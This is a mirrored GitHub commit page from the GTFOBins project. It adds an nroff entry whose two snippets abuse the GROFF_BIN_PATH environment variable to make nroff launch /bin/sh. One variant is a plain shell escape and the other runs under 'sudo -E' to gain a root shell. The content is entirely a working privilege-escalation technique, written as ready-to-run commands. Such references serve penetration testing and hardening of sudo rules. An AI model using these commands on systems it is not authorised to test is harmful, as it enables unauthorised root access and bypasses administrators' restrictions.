mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 08:48:54 +01:00 
			
		
		
		
	Create nroff.md
This commit is contained in:
		
							
								
								
									
										17
									
								
								_gtfobins/nroff.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								_gtfobins/nroff.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| --- | ||||
| functions: | ||||
|   shell: | ||||
|     - code: | | ||||
|         TF=$(mktemp -d) | ||||
|         echo '#!/bin/sh' > $TF/groff | ||||
|         echo '/bin/sh' >> $TF/groff | ||||
|         chmod +x $TF/groff | ||||
|         GROFF_BIN_PATH=$TF nroff | ||||
|   sudo: | ||||
|     - code: | | ||||
|         TF=$(mktemp -d) | ||||
|         echo '#!/bin/sh' > $TF/groff | ||||
|         echo '/bin/sh' >> $TF/groff | ||||
|         chmod +x $TF/groff | ||||
|         sudo -E GROFF_BIN_PATH=$TF nroff | ||||
| --- | ||||
		Reference in New Issue
	
	Block a user